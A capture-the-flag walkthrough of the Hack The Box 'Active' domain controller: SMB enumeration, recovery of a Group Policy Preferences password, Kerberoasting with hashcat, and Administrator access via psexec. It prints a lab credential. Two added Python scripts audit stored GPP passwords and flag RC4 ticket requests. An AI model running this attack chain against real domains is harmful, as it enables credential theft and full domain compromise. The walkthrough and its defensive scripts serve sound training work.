HTB Series - Active

tags: htb active windows walkthrough

We start by scanning the target with nmap to find open ports:
nmap -sC -sV -oA active 10.10.10.100


Since we can see DNS (53), LDAP and SMB (445), we are likely on a Windows server.
Inspecting the output, there are no shares listed, so we can try to connect via smbclient with null authentication to enumerate them.
smbclient -L //10.10.10.100

The IPC$ and SYSVOL shares are expected of a domain controller.

smbmap offers similar results.


We note that we only have READ access for the Replication share, so we drill down further into it to look for interesting artifacts.

smbmap -H 10.10.10.100 -r Replication --depth 8 # --depth achieves what a recursive listing would have; 8 was an estimate of how deep we would have to go.


The output shows a Groups.xml file, which is of interest to us, so we download it.

smbmap -H 10.10.10.100 -r Replication --depth 8 -A Groups.xml # -A acquires the file with the specified pattern


From the downloaded file we identify the credentials as follows:


We decrypt the password as shown:


An alternate way to get this would be to use smbclient:

smbclient //10.10.10.100/Replication
Password for [WORKGROUP\cypher]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
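
The Groups.xml finding above is a Group Policy Preferences file carrying a stored password (the cpassword attribute) in a share readable without credentials. As an added example (not part of the original walkthrough), this audit script walks a local copy of a policy tree and reports every GPP file that still stores one; the directory layout, account names and placeholder value in the sample are constructed, and the list of account attribute names is an assumption that may need extending.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP file names that can hold a cpassword attribute (matched case-insensitively).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "printers.xml", "drives.xml"}
# The account attribute name differs between GPP file types (assumed list).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")
# Constructed sample: the cpassword is a placeholder, not a real encrypted value.
SAMPLE = ('<?xml version="1.0" encoding="utf-8"?><Groups><User name="EXAMPLE\\svc_demo">'
          '<Properties action="U" cpassword="CONSTRUCTED-PLACEHOLDER" '
          'userName="EXAMPLE\\svc_demo"/></User></Groups>')
EMPTIED = '<Drives><Drive><Properties cpassword="" userName="x"/></Drive></Drives>'

def find_cpasswords(root_dir):
    """Return one finding per GPP element that stores a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                findings.append({"file": path, "account": None, "note": "unparseable"})
                continue
            for elem in root.iter():
                if not elem.get("cpassword"):  # absent or emptied: nothing stored
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
                # Report location and account only; never echo the stored value.
                findings.append({"file": path, "account": account, "note": "cpassword set"})
    return findings

def demo():
    """Build a constructed policy tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        pol = os.path.join(tmp, "Policies", "{CONSTRUCTED-GUID}", "Preferences")
        os.makedirs(pol)
        for fname, body in (("Groups.xml", SAMPLE), ("Drives.xml", EMPTIED)):
            with open(os.path.join(pol, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(os.path.basename(f["file"]), f["account"], f["note"])
                for f in find_cpasswords(tmp)]

if __name__ == "__main__":
    print(demo())
```

Any account the scan reports should have its password rotated and the stored value removed from the policy, since every domain member that can read the share can read the file.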


We then use Impacket to view the users in the domain:
GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs


We try further enumeration using the given user account as follows:

smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
# -d is for domain, -u is for user, -p is for password and -H is for host


We utilize the credentials gathered as follows:

On a Windows box, open up a session as the user:

runas /netonly /user:active.htb\svc_tgs cmd


We can use BloodHound to proceed as follows:
Use SharpHound on the Windows box


Verify the connection is working okay


Turns out we just needed to add the DC as the primary DNS in the ethernet settings.


From BloodHound we query which accounts are susceptible to Kerberoasting


Attempt at Kerberoasting


From the hash acquired, we can look it up in the hashcat example hashes to find the cracking mode to use


We can then proceed to attempt to crack the hash with hashcat
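
On the domain controller side, the ticket requests made during the Kerberoasting step above are recorded as Security event 4769. As an added example (not part of the original walkthrough), this triage script flags successful RC4 service-ticket requests for user-backed services and groups them by requesting account; the key=value log format and all account and service names are constructed, and the field names follow event 4769.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample: event 4769 records flattened to key=value text.
SAMPLE_EVENTS = """\
TargetUserName=alice@EXAMPLE.LOCAL ServiceName=FILE01$ TicketEncryptionType=0x12 Status=0x0
TargetUserName=svc_demo@EXAMPLE.LOCAL ServiceName=sqlsvc TicketEncryptionType=0x17 Status=0x0
TargetUserName=svc_demo@EXAMPLE.LOCAL ServiceName=backupsvc TicketEncryptionType=0x17 Status=0x0
TargetUserName=svc_demo@EXAMPLE.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0
TargetUserName=bob@EXAMPLE.LOCAL ServiceName=LEGACY01$ TicketEncryptionType=0x17 Status=0x0
TargetUserName=bob@EXAMPLE.LOCAL ServiceName=websvc TicketEncryptionType=0x17 Status=0x1b
this line is truncated garbage
"""

def parse_event(line):
    """Turn one key=value line into a dict; return None if fields are missing."""
    fields = dict(tok.split("=", 1) for tok in line.split() if "=" in tok)
    needed = ("TargetUserName", "ServiceName", "TicketEncryptionType", "Status")
    return fields if all(k in fields for k in needed) else None

def is_suspicious(ev):
    """Successful RC4 service ticket for a user-backed (non-machine) service."""
    try:
        etype = int(ev["TicketEncryptionType"], 16)
        status = int(ev["Status"], 16)
    except ValueError:
        return False
    svc = ev["ServiceName"].lower()
    # Machine accounts end in "$"; krbtgt is the ticket-granting service itself.
    return (etype == RC4_HMAC and status == 0
            and not svc.endswith("$") and svc != "krbtgt")

def rc4_requests_by_account(log_text):
    """Map each requesting account to the sorted services it got RC4 tickets for."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev and is_suspicious(ev):
            hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return {acct: sorted(svcs) for acct, svcs in hits.items()}

if __name__ == "__main__":
    for acct, svcs in rc4_requests_by_account(SAMPLE_EVENTS).items():
        print(f"{acct}: {len(svcs)} RC4 service ticket(s): {', '.join(svcs)}")
```

Legacy clients also request RC4 tickets, so a hit is a lead to triage rather than proof; one account requesting tickets for several unrelated services in a short time is the stronger signal.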


We then proceed to use the credentials acquired to log in as the Administrator via PsExec:
psexec.py domain/User@ip


Own the root flag
